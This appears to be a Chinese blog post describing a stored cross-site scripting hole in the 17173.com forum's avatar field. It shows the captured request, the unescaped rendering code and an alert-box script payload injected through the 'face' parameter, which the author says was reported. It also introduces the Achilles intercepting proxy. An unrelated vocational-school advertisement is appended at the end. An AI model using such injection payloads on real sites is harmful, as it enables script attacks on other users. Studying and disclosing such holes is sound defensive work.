記錄-achilles

WWW.17173.COM作為中國第一的游戲中心， 近正在進行論壇更換，由于沒有完全制作完成就公布，遺留了不少漏洞，以下是我對頭像系統的研究：
頭像系統不允許用戶直接更改頭像的地址,但是我們可以抓
抓下來的東西如下
代碼
face=XXX.GIF&realname=wahahame&sex=1&yyyy=1985&mm=7&dd=1&province=19&city=379&Submit=%C8%B7%A1%A1%B6%A8&Work=saveMdy

測試發現通過更改face可以更改頭像,但好象也僅能做到這一步?
我們還能做更多嗎?
保存一個發帖頁,關于圖象顯示的JS代碼如下

代碼
strHTML+="<td width='20%' align='center' height='23' valign=top><a href='/show_userinfo.php?user="+oTip.owner+"' target='_blank'><b>"+oTip.nickname+"</b><br>";
strHTML+="<img src='http://my.17173.com/face/"+oTip.face+"' border=0></a><br><br>";
strHTML+="<table width= border=0 cellspacing=0 cellpadding=0 height=64>";

很顯然沒做處理.如果我們把頭像地址改為:XXX.GIF'><script>alert("無用君向大家問好");</script>會怎么樣呢
測試證明,腳本成功運行了.......
上報技術客服
收手,沒再進一步破壞了.

achilles是一個代理軟件。你可以在本地開一個代理
然后把IE指向他
這個代理與其他代理軟件不同的是，你可以在發送請求和受到請求的時候把數據攔截下來
并且可以修改它，然后考慮是否發送它
對于分析一個網站：我到底提交了什么信息；我收到的COOKIE是什么；并且修改他們很是方便
不用請Iris這樣的大部頭，或者NC這樣可操作性不強的東西了。

　　湖南省陽光電子技術學校常年開設：手機維修培訓、家電維修培訓、電工培訓、電腦維修培訓、焊工培訓--面向全國火爆招生！網址：http://www.hnygpx.com 報名電話：13807313137)。安置就業。考試合格頒發全國通用權威證書。采用我校多年來獨創的“模塊教學法”,理論與實踐相結合、原理＋圖紙＋機器三位一體的教學模式，半天理論，半天實踐，通俗易懂，確保無任何基礎者也能全面掌握維修技能、成為同行業中的佼佼者。工作(一期不會，免費學會為止)。